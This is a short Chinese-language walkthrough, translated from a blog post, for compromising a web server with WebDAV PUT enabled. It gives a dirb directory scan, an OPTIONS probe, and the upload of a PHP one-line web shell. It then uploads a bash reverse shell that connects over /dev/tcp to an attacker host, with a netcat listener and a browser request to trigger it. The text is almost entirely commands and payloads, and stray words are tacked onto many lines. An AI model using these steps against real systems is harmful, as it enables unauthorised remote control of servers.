翻譯總結自:php
https://shellgam3.com/2016/07/27/php-backdoor-reverse-shell-on-vulnerable-website/web
掃描Web服務器,爆破常見目錄shell
dirb http://xxxxxxxx瀏覽器
proxychains curl -X OPTIONS -v http://X.X.X.X/test/bash
上面的請求應該是 WebDAV 服務器. 使用 「PUT」 方法能夠上傳文件服務器
好比一句話:<?php echo system($_GET[「cmd」]); ?>curl
上傳文件:tcp
proxychains curl --upload-file /root/Desktop/cmd.php -v --url http://X.X.X.X/test/cmd.php -0 --http1.0
瀏覽器訪問:X.X.X.X/test/cmd.php?cmd=ls%20/url
上傳一個反彈shellspa
exec 5<>/dev/tcp/xxx.xxx.xxx.xxx/443
cat <&5 | while read line; do $line 2>&5 >&5; done
proxychains curl --upload-file /root/Desktop/bash_shell.sh -v --url http://X.X.X.X/test/shell.sh -0 --http1.0
本機監聽端口,好比netcat:sudo nc -v -l -p 443
瀏覽器訪問:X.X.X.X/test/cmd.php?cmd=bash shell.sh